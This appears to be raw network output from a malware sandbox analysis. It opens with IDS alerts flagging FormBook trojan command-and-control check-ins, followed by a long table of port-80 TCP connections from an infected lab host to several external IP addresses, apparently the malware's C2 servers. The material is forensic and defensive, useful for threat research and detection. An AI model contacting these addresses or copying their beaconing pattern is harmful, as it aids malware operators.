07/03/24-18:43:16.765404  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59449        80         192.168.2.6  47.239.13.172
07/03/24-18:41:03.551279  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59411        80         192.168.2.6  156.251.142.105
07/03/24-18:43:40.139322  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59455        80         192.168.2.6  47.239.13.172
07/03/24-18:40:51.463532  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59408        80         192.168.2.6  81.88.48.71
07/03/24-18:43:53.949463  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59459        80         192.168.2.6  46.235.40.27
07/03/24-18:41:11.155608  TCP       2855465  ETPRO TROJAN FormBook CnC Checkin (GET) M2   59414        80         192.168.2.6  156.251.142.105
07/03/24-18:43:09.167025  TCP       2855464  ETPRO TROJAN FormBook CnC Checkin (POST) M3  59446        80         192.168.2.6  47.239.13.172
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jul 3, 2024 18:52:31.018404961 CEST  49719        80         192.168.2.6      89.31.143.90
Jul 3, 2024 18:52:31.023323059 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.023411036 CEST  49719        80         192.168.2.6      89.31.143.90
Jul 3, 2024 18:52:31.026048899 CEST  49719        80         192.168.2.6      89.31.143.90
Jul 3, 2024 18:52:31.030908108 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684258938 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684350014 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684400082 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684416056 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684437037 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684451103 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684464931 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684494972 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684510946 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:31.684659004 CEST  49719        80         192.168.2.6      89.31.143.90
Jul 3, 2024 18:52:31.690493107 CEST  49719        80         192.168.2.6      89.31.143.90
Jul 3, 2024 18:52:31.695302010 CEST  80           49719      89.31.143.90     192.168.2.6
Jul 3, 2024 18:52:46.807109118 CEST  49723        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:46.812325954 CEST  80           49723      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:46.814584970 CEST  49723        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:46.816431999 CEST  49723        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:46.821361065 CEST  80           49723      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:47.505155087 CEST  80           49723      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:47.505317926 CEST  80           49723      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:47.505378008 CEST  49723        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:48.328389883 CEST  49723        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:49.346865892 CEST  49724        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:49.351807117 CEST  80           49724      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:49.351984024 CEST  49724        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:49.353669882 CEST  49724        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:49.358489990 CEST  80           49724      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:50.020333052 CEST  80           49724      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:50.020827055 CEST  80           49724      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:50.020876884 CEST  49724        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:50.859812975 CEST  49724        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:51.878088951 CEST  49726        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:51.884552002 CEST  80           49726      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:51.884639978 CEST  49726        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:51.886478901 CEST  49726        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:51.891570091 CEST  80           49726      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:51.891746044 CEST  80           49726      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:52.600522041 CEST  80           49726      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:52.600794077 CEST  80           49726      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:52.600867033 CEST  49726        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:53.391078949 CEST  49726        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:54.409574032 CEST  49727        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:54.414679050 CEST  80           49727      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:54.414792061 CEST  49727        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:54.416510105 CEST  49727        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:54.421446085 CEST  80           49727      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:55.116456985 CEST  80           49727      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:55.116543055 CEST  80           49727      81.88.48.71      192.168.2.6
Jul 3, 2024 18:52:55.116638899 CEST  49727        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:55.119079113 CEST  49727        80         192.168.2.6      81.88.48.71
Jul 3, 2024 18:52:55.124773026 CEST  80           49727      81.88.48.71      192.168.2.6
Jul 3, 2024 18:53:00.704240084 CEST  49728        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:00.709146023 CEST  80           49728      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:00.709219933 CEST  49728        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:00.711011887 CEST  49728        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:00.716459036 CEST  80           49728      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:01.311511993 CEST  80           49728      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:01.311537981 CEST  80           49728      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:01.311654091 CEST  49728        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:02.219259024 CEST  49728        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:03.241764069 CEST  49729        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:03.246963978 CEST  80           49729      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:03.247093916 CEST  49729        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:03.258177042 CEST  49729        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:03.263106108 CEST  80           49729      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:03.830629110 CEST  80           49729      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:03.830897093 CEST  80           49729      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:03.830956936 CEST  49729        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:04.766041994 CEST  49729        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:05.792187929 CEST  49730        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:05.797092915 CEST  80           49730      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:05.797197104 CEST  49730        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:05.798965931 CEST  49730        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:05.803745985 CEST  80           49730      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:05.803844929 CEST  80           49730      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:06.325517893 CEST  80           49730      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:06.325638056 CEST  80           49730      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:06.325680017 CEST  49730        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:07.312849045 CEST  49730        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:08.331899881 CEST  49731        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:08.336827040 CEST  80           49731      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:08.336920023 CEST  49731        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:08.338696003 CEST  49731        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:08.343558073 CEST  80           49731      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:09.105983973 CEST  80           49731      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:09.106955051 CEST  80           49731      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:09.107017040 CEST  49731        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:09.108711004 CEST  49731        80         192.168.2.6      156.251.142.107
Jul 3, 2024 18:53:09.113709927 CEST  80           49731      156.251.142.107  192.168.2.6
Jul 3, 2024 18:53:14.198893070 CEST  49733        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:14.204699039 CEST  80           49733      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:14.204793930 CEST  49733        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:14.206666946 CEST  49733        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:14.212359905 CEST  80           49733      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:14.911663055 CEST  80           49733      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:14.916801929 CEST  80           49733      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:14.916883945 CEST  49733        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:15.719125032 CEST  49733        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:16.739614010 CEST  49734        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:16.744534016 CEST  80           49734      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:16.744671106 CEST  49734        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:16.746392012 CEST  49734        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:16.751276970 CEST  80           49734      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:17.413774967 CEST  80           49734      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:17.413955927 CEST  80           49734      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:17.414016962 CEST  49734        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:18.250407934 CEST  49734        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:19.268959999 CEST  49735        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:19.274094105 CEST  80           49735      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:19.274203062 CEST  49735        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:19.276115894 CEST  49735        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:19.281852961 CEST  80           49735      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:19.282375097 CEST  80           49735      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:19.942409039 CEST  80           49735      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:19.942737103 CEST  80           49735      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:19.942795038 CEST  49735        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:20.781693935 CEST  49735        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:21.799994946 CEST  49736        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:21.805634975 CEST  80           49736      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:21.805717945 CEST  49736        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:21.807485104 CEST  49736        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:21.812426090 CEST  80           49736      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:22.644169092 CEST  80           49736      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:22.644331932 CEST  80           49736      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:22.644498110 CEST  49736        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:22.646984100 CEST  49736        80         192.168.2.6      81.88.57.70
Jul 3, 2024 18:53:22.651760101 CEST  80           49736      81.88.57.70      192.168.2.6
Jul 3, 2024 18:53:27.810640097 CEST  49737        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:27.815581083 CEST  80           49737      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:27.818994045 CEST  49737        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:27.820875883 CEST  49737        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:27.825647116 CEST  80           49737      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:28.443382025 CEST  80           49737      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:28.443494081 CEST  80           49737      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:28.447455883 CEST  49737        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:29.328663111 CEST  49737        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:30.347309113 CEST  49738        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:30.352233887 CEST  80           49738      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:30.352471113 CEST  49738        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:30.354630947 CEST  49738        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:30.360522985 CEST  80           49738      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:31.023020029 CEST  80           49738      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:31.023063898 CEST  80           49738      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:31.023113012 CEST  49738        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:31.859668970 CEST  49738        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:32.878865957 CEST  49739        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:32.883696079 CEST  80           49739      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:32.883759022 CEST  49739        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:32.885875940 CEST  49739        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:32.890701056 CEST  80           49739      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:32.890907049 CEST  80           49739      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:33.485022068 CEST  80           49739      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:33.485332966 CEST  80           49739      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:33.491321087 CEST  49739        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:34.390940905 CEST  49739        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:35.410419941 CEST  49740        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:35.416013956 CEST  80           49740      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:35.416079998 CEST  49740        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:35.418169022 CEST  49740        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:35.423006058 CEST  80           49740      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:36.031656027 CEST  80           49740      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:36.031806946 CEST  80           49740      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:36.032135963 CEST  49740        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:36.035301924 CEST  49740        80         192.168.2.6      203.161.49.220
Jul 3, 2024 18:53:36.040018082 CEST  80           49740      203.161.49.220   192.168.2.6
Jul 3, 2024 18:53:49.595693111 CEST  49741        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:49.600816011 CEST  80           49741      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:49.600899935 CEST  49741        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:49.602623940 CEST  49741        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:49.607989073 CEST  80           49741      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:50.554016113 CEST  80           49741      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:50.554235935 CEST  80           49741      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:50.554368019 CEST  49741        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:51.109714031 CEST  49741        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:52.131339073 CEST  49743        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:52.136742115 CEST  80           49743      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:52.139704943 CEST  49743        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:52.141702890 CEST  49743        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:52.146483898 CEST  80           49743      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:53.073028088 CEST  80           49743      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:53.073506117 CEST  80           49743      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:53.073545933 CEST  49743        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:53.656884909 CEST  49743        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:54.675180912 CEST  49744        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:54.680440903 CEST  80           49744      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:54.680506945 CEST  49744        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:54.682863951 CEST  49744        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:54.687695026 CEST  80           49744      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:54.688282967 CEST  80           49744      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:55.608947039 CEST  80           49744      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:55.609812975 CEST  80           49744      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:55.613604069 CEST  49744        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:56.189596891 CEST  49744        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:57.206825972 CEST  49745        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:57.211642981 CEST  80           49745      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:57.211714983 CEST  49745        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:57.213774920 CEST  49745        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:57.218707085 CEST  80           49745      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:58.245620012 CEST  80           49745      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:58.245637894 CEST  80           49745      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:58.245649099 CEST  80           49745      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:58.245661020 CEST  80           49745      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:58.245671034 CEST  80           49745      152.32.156.214   192.168.2.6
Jul 3, 2024 18:53:58.245826960 CEST  49745        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:58.245826960 CEST  49745        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:58.251316071 CEST  49745        80         192.168.2.6      152.32.156.214
Jul 3, 2024 18:53:58.256035089 CEST  80           49745      152.32.156.214   192.168.2.6
Jul 3, 2024 18:54:03.376650095 CEST  49746        80         192.168.2.6      64.190.62.22
Jul 3, 2024 18:54:03.381578922 CEST  80           49746      64.190.62.22     192.168.2.6
Jul 3, 2024 18:54:03.381650925 CEST  49746        80         192.168.2.6      64.190.62.22
Jul 3, 2024 18:54:03.383797884 CEST  49746        80         192.168.2.6      64.190.62.22
Jul 3, 2024 18:54:03.388559103 CEST  80           49746      64.190.62.22     192.168.2.6
Jul 3, 2024 18:54:04.029783964 CEST  80           49746      64.190.62.22     192.168.2.6
Jul 3, 2024 18:54:04.029802084 CEST  80           49746      64.190.62.22     192.168.2.6
Jul 3, 2024 18:54:04.029920101 CEST  49746        80         192.168.2.6      64.190.62.22
Jul 3, 2024 18:54:04.890922070 CEST  49746        80         192.168.2.6      64.190.62.22
Jul 3, 2024 18:54:05.910901070 CEST  49747        80         192.168.2.6      64.190.62.22
Jul 3, 2024 18:54:05.916130066 CEST  80           49747      64.190.62.22     192.168.2.6
Jul 3, 2024 18:54:05.919410944 CEST  49747        80         192.168.2.6      64.190.62.22
Jul 3, 2024 18:54:05.923355103 CEST  49747        80         192.168.2.6      64.190.62.22
Jul 3, 2024 18:54:05.928204060 CEST  80           49747      64.190.62.22     192.168.2.6
                                            Jul 3, 2024 18:54:06.585807085 CEST804974764.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:06.585839987 CEST804974764.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:06.585911036 CEST4974780192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:07.422425032 CEST4974780192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:08.442048073 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:08.446876049 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:08.447073936 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:08.449192047 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:08.456381083 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:08.456392050 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.202433109 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.202459097 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.202538967 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:09.204359055 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.204437971 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:09.427315950 CEST804974864.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:09.427378893 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:09.955332994 CEST4974880192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:10.972075939 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:10.977056026 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:10.977121115 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:10.979861021 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:10.984910011 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:11.626230001 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:11.626373053 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:11.626570940 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:11.631335974 CEST4974980192.168.2.664.190.62.22
                                            Jul 3, 2024 18:54:11.636754990 CEST804974964.190.62.22192.168.2.6
                                            Jul 3, 2024 18:54:16.852211952 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:16.857045889 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:16.857132912 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:16.859086990 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:16.864048004 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895632029 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895693064 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895704031 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895894051 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895905972 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895916939 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895929098 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.895956993 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:17.895994902 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:17.896298885 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.896311045 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.896395922 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:17.896451950 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.897423983 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:17.900835037 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.900934935 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.900945902 CEST804975023.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:17.901046038 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:18.375487089 CEST4975080192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:19.393928051 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:19.399202108 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:19.400398016 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:19.402909040 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:19.407715082 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.505855083 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.505884886 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.505898952 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506010056 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.506022930 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506037951 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506094933 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.506234884 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506247044 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506257057 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506333113 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.506463051 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506477118 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.506649971 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.510879040 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.510943890 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.510956049 CEST804975123.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:20.511190891 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:20.906682968 CEST4975180192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:21.924913883 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:21.929889917 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:21.930037975 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:21.933526993 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:21.938479900 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:21.938509941 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050549984 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050573111 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050578117 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050646067 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.050668955 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050726891 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.050769091 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050776958 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050801992 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.050978899 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.050987005 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.051018953 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.051026106 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.051067114 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.051080942 CEST4975280192.168.2.623.105.172.12
                                            Jul 3, 2024 18:54:23.055552006 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.055664062 CEST804975223.105.172.12192.168.2.6
                                            Jul 3, 2024 18:54:23.055732965 CEST4975280192.168.2.623.105.172.12
